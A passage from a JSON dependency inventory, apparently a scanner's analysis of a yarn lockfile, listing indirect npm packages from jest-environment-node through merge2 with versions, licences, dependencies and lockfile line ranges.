"ID": "jest-environment-node@29.7.0", "Name": "jest-environment-node", "Identifier": { "PURL": "pkg:npm/jest-environment-node@29.7.0", "UID": "f7a7b2d679110c89" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/environment@29.7.0", "@jest/fake-timers@29.7.0", "@jest/types@29.6.3", "@types/node@24.7.0", "jest-mock@29.7.0", "jest-util@29.7.0" ], "Locations": [ { "StartLine": 6611, "EndLine": 6621 } ], "AnalyzedBy": "yarn" }, { "ID": "jest-get-type@29.6.3", "Name": "jest-get-type", "Identifier": { "PURL": "pkg:npm/jest-get-type@29.6.3", "UID": "3d25d06fccf9039b" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6623, "EndLine": 6626 } ], "AnalyzedBy": "yarn" }, { "ID": "jest-haste-map@29.7.0", "Name": "jest-haste-map", "Identifier": { "PURL": "pkg:npm/jest-haste-map@29.7.0", "UID": "82aaf45fd73e650d" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3", "@types/graceful-fs@4.1.9", "@types/node@24.7.0", "anymatch@3.1.3", "fb-watchman@2.0.2", "graceful-fs@4.2.11", "jest-regex-util@29.6.3", "jest-util@29.7.0", "jest-worker@29.7.0", "micromatch@4.0.8", "walker@1.0.8" ], "Locations": [ { "StartLine": 6628, "EndLine": 6645 } ], "AnalyzedBy": "yarn" }, { "ID": "jest-message-util@29.7.0", "Name": "jest-message-util", "Identifier": { "PURL": "pkg:npm/jest-message-util@29.7.0", "UID": "c1640d65e70f141b" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "@jest/types@29.6.3", "@types/stack-utils@2.0.3", "chalk@4.1.2", "graceful-fs@4.2.11", "micromatch@4.0.8", "pretty-format@29.7.0", "slash@3.0.0", "stack-utils@2.0.6" ], "Locations": [ { "StartLine": 6665, "EndLine": 6678 } ], "AnalyzedBy": "yarn" }, { "ID": "jest-mock@29.7.0", "Name": "jest-mock", "Identifier": { "PURL": "pkg:npm/jest-mock@29.7.0", "UID": "b6754912f87402ef" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3", "@types/node@24.7.0", "jest-util@29.7.0" ], "Locations": [ { "StartLine": 6680, "EndLine": 6687 } ], "AnalyzedBy": "yarn" }, { "ID": "jest-regex-util@29.6.3", "Name": "jest-regex-util", "Identifier": { "PURL": "pkg:npm/jest-regex-util@29.6.3", "UID": "71a4c52851f7f110" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6694, "EndLine": 6697 } ], "AnalyzedBy": "yarn" }, { "ID": "jest-util@29.7.0", "Name": "jest-util", "Identifier": { "PURL": "pkg:npm/jest-util@29.7.0", "UID": "2ee2d6dc7124e4a5" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3", "@types/node@24.7.0", "chalk@4.1.2", "ci-info@3.9.0", "graceful-fs@4.2.11", "picomatch@2.3.1" ], "Locations": [ { "StartLine": 6803, "EndLine": 6813 } ], "AnalyzedBy": "yarn" }, { "ID": "jest-validate@29.7.0", "Name": "jest-validate", "Identifier": { "PURL": "pkg:npm/jest-validate@29.7.0", "UID": "893d04b518c1d1a" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3", "camelcase@6.3.0", "chalk@4.1.2", "jest-get-type@29.6.3", "leven@3.1.0", "pretty-format@29.7.0" ], "Locations": [ { "StartLine": 6815, "EndLine": 6825 } ], "AnalyzedBy": "yarn" }, { "ID": "jest-worker@29.7.0", "Name": "jest-worker", "Identifier": { "PURL": "pkg:npm/jest-worker@29.7.0", "UID": "45d289ca974a7f22" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@24.7.0", "jest-util@29.7.0", "merge-stream@2.0.0", "supports-color@8.1.1" ], "Locations": [ { "StartLine": 6841, "EndLine": 6849 } ], "AnalyzedBy": "yarn" }, { "ID": "js-tokens@4.0.0", "Name": "js-tokens", "Identifier": { "PURL": "pkg:npm/js-tokens@4.0.0", "UID": "eff759740d1dab2d" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6872, "EndLine": 6875 } ], "AnalyzedBy": "yarn" }, { "ID": "js-yaml@3.14.1", "Name": "js-yaml", "Identifier": { "PURL": "pkg:npm/js-yaml@3.14.1", "UID": "63902cab6028fa26" }, "Version": "3.14.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "argparse@1.0.10", "esprima@4.0.1" ], "Locations": [ { "StartLine": 6877, "EndLine": 6883 } ], "AnalyzedBy": "yarn" }, { "ID": "js-yaml@4.1.0", "Name": "js-yaml", "Identifier": { "PURL": "pkg:npm/js-yaml@4.1.0", "UID": "7704269816196759" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "argparse@2.0.1" ], "Locations": [ { "StartLine": 6885, "EndLine": 6890 } ], "AnalyzedBy": "yarn" }, { "ID": "jsc-safe-url@0.2.4", "Name": "jsc-safe-url", "Identifier": { "PURL": "pkg:npm/jsc-safe-url@0.2.4", "UID": "fddbd30a1afb9f3e" }, "Version": "0.2.4", "Licenses": [ "0BSD" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6892, "EndLine": 6895 } ], "AnalyzedBy": "yarn" }, { "ID": "jsesc@3.1.0", "Name": "jsesc", "Identifier": { "PURL": "pkg:npm/jsesc@3.1.0", "UID": "216dba74c18659e0" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6897, "EndLine": 6900 } ], "AnalyzedBy": "yarn" }, { "ID": "json-parse-even-better-errors@2.3.1", "Name": "json-parse-even-better-errors", "Identifier": { "PURL": "pkg:npm/json-parse-even-better-errors@2.3.1", "UID": "40027601eb598c6e" }, "Version": "2.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6907, "EndLine": 6910 } ], "AnalyzedBy": "yarn" }, { "ID": "json-parse-even-better-errors@4.0.0", "Name": "json-parse-even-better-errors", "Identifier": { "PURL": "pkg:npm/json-parse-even-better-errors@4.0.0", "UID": "9fb08d1d04686211" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6912, "EndLine": 6913 } ], "AnalyzedBy": "yarn" }, { "ID": "json-stringify-nice@1.1.4", "Name": "json-stringify-nice", "Identifier": { "PURL": "pkg:npm/json-stringify-nice@1.1.4", "UID": "ab6eaa03ee25e827" }, "Version": "1.1.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6936, "EndLine": 6939 } ], "AnalyzedBy": "yarn" }, { "ID": "json5@2.2.3", "Name": "json5", "Identifier": { "PURL": "pkg:npm/json5@2.2.3", "UID": "ca4c4fa971359a2c" }, "Version": "2.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6941, "EndLine": 6944 } ], "AnalyzedBy": "yarn" }, { "ID": "jsonfile@4.0.0", "Name": "jsonfile", "Identifier": { "PURL": "pkg:npm/jsonfile@4.0.0", "UID": "894825b005c1f64d" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6946, "EndLine": 6951 } ], "AnalyzedBy": "yarn" }, { "ID": "jsonfile@6.2.0", "Name": "jsonfile", "Identifier": { "PURL": "pkg:npm/jsonfile@6.2.0", "UID": "6899cbb087af522e" }, "Version": "6.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "universalify@2.0.1" ], "Locations": [ { "StartLine": 6953, "EndLine": 6960 } ], "AnalyzedBy": "yarn" }, { "ID": "jsonparse@1.3.1", "Name": "jsonparse", "Identifier": { "PURL": "pkg:npm/jsonparse@1.3.1", "UID": "72c4907201d50031" }, "Version": "1.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6967, "EndLine": 6970 } ], "AnalyzedBy": "yarn" }, { "ID": "just-diff@6.0.2", "Name": "just-diff", "Identifier": { "PURL": "pkg:npm/just-diff@6.0.2", "UID": "7c9cb0f3d1423e86" }, "Version": "6.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6987, "EndLine": 6990 } ], "AnalyzedBy": "yarn" }, { "ID": "just-diff-apply@5.5.0", "Name": "just-diff-apply", "Identifier": { "PURL": "pkg:npm/just-diff-apply@5.5.0", "UID": "6cec619a7cf7d94b" }, "Version": "5.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6982, "EndLine": 6985 } ], "AnalyzedBy": "yarn" }, { "ID": "kind-of@6.0.3", "Name": "kind-of", "Identifier": { "PURL": "pkg:npm/kind-of@6.0.3", "UID": "a28eca7c06e76a64" }, "Version": "6.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6999, "EndLine": 7002 } ], "AnalyzedBy": "yarn" }, { "ID": "kleur@3.0.3", "Name": "kleur", "Identifier": { "PURL": "pkg:npm/kleur@3.0.3", "UID": "5d28f2b81c6668f8" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7011, "EndLine": 7014 } ], "AnalyzedBy": "yarn" }, { "ID": "launch-editor@2.11.1", "Name": "launch-editor", "Identifier": { "PURL": "pkg:npm/launch-editor@2.11.1", "UID": "6acbf1ba1b1a95a6" }, "Version": "2.11.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "picocolors@1.1.1", "shell-quote@1.8.3" ], "Locations": [ { "StartLine": 7016, "EndLine": 7022 } ], "AnalyzedBy": "yarn" }, { "ID": "leven@3.1.0", "Name": "leven", "Identifier": { "PURL": "pkg:npm/leven@3.1.0", "UID": "a1960e8cab03e200" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7024, "EndLine": 7027 } ], "AnalyzedBy": "yarn" }, { "ID": "libnpmaccess@10.0.3", "Name": "libnpmaccess", "Identifier": { "PURL": "pkg:npm/libnpmaccess@10.0.3", "UID": "3bb30b162615194c" }, "Version": "10.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-package-arg@13.0.1", "npm-registry-fetch@19.0.0" ], "Locations": [ { "StartLine": 7037, "EndLine": 7043 } ], "AnalyzedBy": "yarn" }, { "ID": "libnpmdiff@8.0.9", "Name": "libnpmdiff", "Identifier": { "PURL": "pkg:npm/libnpmdiff@8.0.9", "UID": "32edba30261924dd" }, "Version": "8.0.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/arborist@9.1.6", "@npmcli/installed-package-contents@3.0.0", "binary-extensions@3.1.0", "diff@8.0.2", "minimatch@10.0.3", "npm-package-arg@13.0.1", "pacote@21.0.3", "tar@7.5.1" ], "Locations": [ { "StartLine": 7045, "EndLine": 7055 } ], "AnalyzedBy": "yarn" }, { "ID": "libnpmexec@10.1.8", "Name": "libnpmexec", "Identifier": { "PURL": "pkg:npm/libnpmexec@10.1.8", "UID": "b43fe360a8ca39c3" }, "Version": "10.1.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/arborist@9.1.6", "@npmcli/package-json@7.0.1", "@npmcli/run-script@10.0.0", "ci-info@4.3.1", "npm-package-arg@13.0.1", "pacote@21.0.3", "proc-log@5.0.0", "promise-retry@2.0.1", "read@4.1.0", "semver@7.7.3", "signal-exit@4.1.0", "walk-up-path@4.0.0" ], "Locations": [ { "StartLine": 7057, "EndLine": 7071 } ], "AnalyzedBy": "yarn" }, { "ID": "libnpmfund@7.0.9", "Name": "libnpmfund", "Identifier": { "PURL": "pkg:npm/libnpmfund@7.0.9", "UID": "a4a3c68ee60321ea" }, "Version": "7.0.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/arborist@9.1.6" ], "Locations": [ { "StartLine": 7073, "EndLine": 7076 } ], "AnalyzedBy": "yarn" }, { "ID": "libnpmorg@8.0.1", "Name": "libnpmorg", "Identifier": { "PURL": "pkg:npm/libnpmorg@8.0.1", "UID": "e6ee5acd03b37822" }, "Version": "8.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "aproba@2.1.0", "npm-registry-fetch@19.0.0" ], "Locations": [ { "StartLine": 7078, "EndLine": 7084 } ], "AnalyzedBy": "yarn" }, { "ID": "libnpmpack@9.0.9", "Name": "libnpmpack", "Identifier": { "PURL": "pkg:npm/libnpmpack@9.0.9", "UID": "13783388efa02f68" }, "Version": "9.0.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/arborist@9.1.6", "@npmcli/run-script@10.0.0", "npm-package-arg@13.0.1", "pacote@21.0.3" ], "Locations": [ { "StartLine": 7086, "EndLine": 7092 } ], "AnalyzedBy": "yarn" }, { "ID": "libnpmpublish@11.1.2", "Name": "libnpmpublish", "Identifier": { "PURL": "pkg:npm/libnpmpublish@11.1.2", "UID": "45920cecab5f3f1f" }, "Version": "11.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/package-json@7.0.1", "ci-info@4.3.1", "npm-package-arg@13.0.1", "npm-registry-fetch@19.0.0", "proc-log@5.0.0", "semver@7.7.3", "sigstore@4.0.0", "ssri@12.0.0" ], "Locations": [ { "StartLine": 7094, "EndLine": 7104 } ], "AnalyzedBy": "yarn" }, { "ID": "libnpmsearch@9.0.1", "Name": "libnpmsearch", "Identifier": { "PURL": "pkg:npm/libnpmsearch@9.0.1", "UID": "c0a01e834f55c09a" }, "Version": "9.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-registry-fetch@19.0.0" ], "Locations": [ { "StartLine": 7106, "EndLine": 7111 } ], "AnalyzedBy": "yarn" }, { "ID": "libnpmteam@8.0.2", "Name": "libnpmteam", "Identifier": { "PURL": "pkg:npm/libnpmteam@8.0.2", "UID": "7ec370c907d4711c" }, "Version": "8.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "aproba@2.1.0", "npm-registry-fetch@19.0.0" ], "Locations": [ { "StartLine": 7113, "EndLine": 7119 } ], "AnalyzedBy": "yarn" }, { "ID": "libnpmversion@8.0.2", "Name": "libnpmversion", "Identifier": { "PURL": "pkg:npm/libnpmversion@8.0.2", "UID": "d1219dc735f3b387" }, "Version": "8.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/git@7.0.0", "@npmcli/run-script@10.0.0", "json-parse-even-better-errors@4.0.0", "proc-log@5.0.0", "semver@7.7.3" ], "Locations": [ { "StartLine": 7121, "EndLine": 7128 } ], "AnalyzedBy": "yarn" }, { "ID": "lighthouse-logger@1.4.2", "Name": "lighthouse-logger", "Identifier": { "PURL": "pkg:npm/lighthouse-logger@1.4.2", "UID": "4174455ac831cde7" }, "Version": "1.4.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "marky@1.3.0" ], "Locations": [ { "StartLine": 7130, "EndLine": 7136 } ], "AnalyzedBy": "yarn" }, { "ID": "lines-and-columns@1.2.4", "Name": "lines-and-columns", "Identifier": { "PURL": "pkg:npm/lines-and-columns@1.2.4", "UID": "7bdaa9bd50321fde" }, "Version": "1.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7138, "EndLine": 7141 } ], "AnalyzedBy": "yarn" }, { "ID": "linkify-it@2.2.0", "Name": "linkify-it", "Identifier": { "PURL": "pkg:npm/linkify-it@2.2.0", "UID": "d445e6f4ab172037" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "uc.micro@1.0.6" ], "Locations": [ { "StartLine": 7143, "EndLine": 7148 } ], "AnalyzedBy": "yarn" }, { "ID": "locate-path@3.0.0", "Name": "locate-path", "Identifier": { "PURL": "pkg:npm/locate-path@3.0.0", "UID": "60ac7d7b0cc47eed" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-locate@3.0.0", "path-exists@3.0.0" ], "Locations": [ { "StartLine": 7150, "EndLine": 7156 } ], "AnalyzedBy": "yarn" }, { "ID": "locate-path@5.0.0", "Name": "locate-path", "Identifier": { "PURL": "pkg:npm/locate-path@5.0.0", "UID": "13104bfc7e2a8f59" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-locate@4.1.0" ], "Locations": [ { "StartLine": 7158, "EndLine": 7163 } ], "AnalyzedBy": "yarn" }, { "ID": "locate-path@6.0.0", "Name": "locate-path", "Identifier": { "PURL": "pkg:npm/locate-path@6.0.0", "UID": "a735df47226cb635" }, "Version": "6.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-locate@5.0.0" ], "Locations": [ { "StartLine": 7165, "EndLine": 7170 } ], "AnalyzedBy": "yarn" }, { "ID": "lodash@4.17.21", "Name": "lodash", "Identifier": { "PURL": "pkg:npm/lodash@4.17.21", "UID": "186d85640a76e982" }, "Version": "4.17.21", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7202, "EndLine": 7205 } ], "AnalyzedBy": "yarn" }, { "ID": "lodash.camelcase@4.3.0", "Name": "lodash.camelcase", "Identifier": { "PURL": "pkg:npm/lodash.camelcase@4.3.0", "UID": "44330bd5170009dc" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7172, "EndLine": 7175 } ], "AnalyzedBy": "yarn" }, { "ID": "lodash.map@4.6.0", "Name": "lodash.map", "Identifier": { "PURL": "pkg:npm/lodash.map@4.6.0", "UID": "99e6665772b849c7" }, "Version": "4.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7182, "EndLine": 7185 } ], "AnalyzedBy": "yarn" }, { "ID": "lodash.throttle@4.1.1", "Name": "lodash.throttle", "Identifier": { "PURL": "pkg:npm/lodash.throttle@4.1.1", "UID": "de06db325ae1f74f" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7192, "EndLine": 7195 } ], "AnalyzedBy": "yarn" }, { "ID": "lodash.zipobject@4.1.3", "Name": "lodash.zipobject", "Identifier": { "PURL": "pkg:npm/lodash.zipobject@4.1.3", "UID": "947db9809932eb43" }, "Version": "4.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7197, "EndLine": 7200 } ], "AnalyzedBy": "yarn" }, { "ID": "log-symbols@4.1.0", "Name": "log-symbols", "Identifier": { "PURL": "pkg:npm/log-symbols@4.1.0", "UID": "147553e5acf74491" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "chalk@4.1.2", "is-unicode-supported@0.1.0" ], "Locations": [ { "StartLine": 7207, "EndLine": 7213 } ], "AnalyzedBy": "yarn" }, { "ID": "long@5.3.2", "Name": "long", "Identifier": { "PURL": "pkg:npm/long@5.3.2", "UID": "9893025480d9ec97" }, "Version": "5.3.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7224, "EndLine": 7227 } ], "AnalyzedBy": "yarn" }, { "ID": "loose-envify@1.4.0", "Name": "loose-envify", "Identifier": { "PURL": "pkg:npm/loose-envify@1.4.0", "UID": "339973e510f603ab" }, "Version": "1.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "js-tokens@4.0.0" ], "Locations": [ { "StartLine": 7229, "EndLine": 7234 } ], "AnalyzedBy": "yarn" }, { "ID": "lower-case@2.0.2", "Name": "lower-case", "Identifier": { "PURL": "pkg:npm/lower-case@2.0.2", "UID": "e92d668f1416c52b" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.8.1" ], "Locations": [ { "StartLine": 7236, "EndLine": 7241 } ], "AnalyzedBy": "yarn" }, { "ID": "lru-cache@10.4.3", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@10.4.3", "UID": "e4fdfa683a527b04" }, "Version": "10.4.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7243, "EndLine": 7246 } ], "AnalyzedBy": "yarn" }, { "ID": "lru-cache@11.2.2", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@11.2.2", "UID": "4a73867d5706e347" }, "Version": "11.2.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7248, "EndLine": 7249 } ], "AnalyzedBy": "yarn" }, { "ID": "lru-cache@5.1.1", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@5.1.1", "UID": "3731bc55c5d02f51" }, "Version": "5.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yallist@3.1.1" ], "Locations": [ { "StartLine": 7251, "EndLine": 7256 } ], "AnalyzedBy": "yarn" }, { "ID": "lru-cache@6.0.0", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@6.0.0", "UID": "a91bc11967da8249" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yallist@4.0.0" ], "Locations": [ { "StartLine": 7258, "EndLine": 7263 } ], "AnalyzedBy": "yarn" }, { "ID": "make-fetch-happen@14.0.3", "Name": "make-fetch-happen", "Identifier": { "PURL": "pkg:npm/make-fetch-happen@14.0.3", "UID": "74637a6016978c2a" }, "Version": "14.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/agent@3.0.0", "cacache@19.0.1", "http-cache-semantics@4.2.0", "minipass@7.1.2", "minipass-fetch@4.0.1", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "negotiator@1.0.0", "proc-log@5.0.0", "promise-retry@2.0.1", "ssri@12.0.0" ], "Locations": [ { "StartLine": 7272, "EndLine": 7285 } ], "AnalyzedBy": "yarn" }, { "ID": "make-fetch-happen@15.0.2", "Name": "make-fetch-happen", "Identifier": { "PURL": "pkg:npm/make-fetch-happen@15.0.2", "UID": "fcc902341701fbb0" }, "Version": "15.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/agent@4.0.0", "cacache@20.0.1", "http-cache-semantics@4.2.0", "minipass@7.1.2", "minipass-fetch@4.0.1", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "negotiator@1.0.0", "proc-log@5.0.0", "promise-retry@2.0.1", "ssri@12.0.0" ], "Locations": [ { "StartLine": 7287, "EndLine": 7300 } ], "AnalyzedBy": "yarn" }, { "ID": "makeerror@1.0.12", "Name": "makeerror", "Identifier": { "PURL": "pkg:npm/makeerror@1.0.12", "UID": "137e23292d3d7e81" }, "Version": "1.0.12", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tmpl@1.0.5" ], "Locations": [ { "StartLine": 7324, "EndLine": 7329 } ], "AnalyzedBy": "yarn" }, { "ID": "map-obj@1.0.1", "Name": "map-obj", "Identifier": { "PURL": "pkg:npm/map-obj@1.0.1", "UID": "73d00ff167b4c8f5" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7331, "EndLine": 7334 } ], "AnalyzedBy": "yarn" }, { "ID": "map-obj@4.3.0", "Name": "map-obj", "Identifier": { "PURL": "pkg:npm/map-obj@4.3.0", "UID": "65f5207dd4717898" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7336, "EndLine": 7339 } ], "AnalyzedBy": "yarn" }, { "ID": "markdown-it@10.0.0", "Name": "markdown-it", "Identifier": { "PURL": "pkg:npm/markdown-it@10.0.0", "UID": "4c261f3cdcfba96d" }, "Version": "10.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "argparse@1.0.10", "entities@2.0.3", "linkify-it@2.2.0", "mdurl@1.0.1", "uc.micro@1.0.6" ], "Locations": [ { "StartLine": 7341, "EndLine": 7350 } ], "AnalyzedBy": "yarn" }, { "ID": "marky@1.3.0", "Name": "marky", "Identifier": { "PURL": "pkg:npm/marky@1.3.0", "UID": "5c9bccd27e446b2e" }, "Version": "1.3.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7352, "EndLine": 7355 } ], "AnalyzedBy": "yarn" }, { "ID": "math-intrinsics@1.1.0", "Name": "math-intrinsics", "Identifier": { "PURL": "pkg:npm/math-intrinsics@1.1.0", "UID": "ae43f5cf03921cfd" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7357, "EndLine": 7360 } ], "AnalyzedBy": "yarn" }, { "ID": "mdn-data@2.0.14", "Name": "mdn-data", "Identifier": { "PURL": "pkg:npm/mdn-data@2.0.14", "UID": "a59a133e487fb1cc" }, "Version": "2.0.14", "Licenses": [ "CC0-1.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7362, "EndLine": 7365 } ], "AnalyzedBy": "yarn" }, { "ID": "mdn-data@2.0.28", "Name": "mdn-data", "Identifier": { "PURL": "pkg:npm/mdn-data@2.0.28", "UID": "b5ba312422eb1d8" }, "Version": "2.0.28", "Licenses": [ "CC0-1.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7367, "EndLine": 7370 } ], "AnalyzedBy": "yarn" }, { "ID": "mdn-data@2.0.30", "Name": "mdn-data", "Identifier": { "PURL": "pkg:npm/mdn-data@2.0.30", "UID": "9c5c06183b5a266a" }, "Version": "2.0.30", "Licenses": [ "CC0-1.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7372, "EndLine": 7375 } ], "AnalyzedBy": "yarn" }, { "ID": "mdurl@1.0.1", "Name": "mdurl", "Identifier": { "PURL": "pkg:npm/mdurl@1.0.1", "UID": "e705d5a8f3423c3a" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7377, "EndLine": 7380 } ], "AnalyzedBy": "yarn" }, { "ID": "memoize-one@5.2.1", "Name": "memoize-one", "Identifier": { "PURL": "pkg:npm/memoize-one@5.2.1", "UID": "599d906e9ae7da58" }, "Version": "5.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7387, "EndLine": 7390 } ], "AnalyzedBy": "yarn" }, { "ID": "meow@9.0.0", "Name": "meow", "Identifier": { "PURL": "pkg:npm/meow@9.0.0", "UID": "14747cfb8b2f0ac2" }, "Version": "9.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/minimist@1.2.5", "camelcase-keys@6.2.2", "decamelize@1.2.0", "decamelize-keys@1.1.1", "hard-rejection@2.1.0", "minimist-options@4.1.0", "normalize-package-data@3.0.3", "read-pkg-up@7.0.1", "redent@3.0.0", "trim-newlines@3.0.1", "type-fest@0.18.1", "yargs-parser@20.2.9" ], "Locations": [ { "StartLine": 7392, "EndLine": 7408 } ], "AnalyzedBy": "yarn" }, { "ID": "merge-options@3.0.4", "Name": "merge-options", "Identifier": { "PURL": "pkg:npm/merge-options@3.0.4", "UID": "2d1cf795d992d4e8" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-plain-obj@2.1.0" ], "Locations": [ { "StartLine": 7410, "EndLine": 7415 } ], "AnalyzedBy": "yarn" }, { "ID": "merge-stream@2.0.0", "Name": "merge-stream", "Identifier": { "PURL": "pkg:npm/merge-stream@2.0.0", "UID": "385a628233c76d5a" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7417, "EndLine": 7420 } ], "AnalyzedBy": "yarn" }, { "ID": "merge2@1.4.1", "Name": "merge2", "Identifier": { "PURL": "pkg:npm/merge2@1.4.1", "UID": "b2eee79c0a007427" }, "Version": "1.4.1", "Licenses": 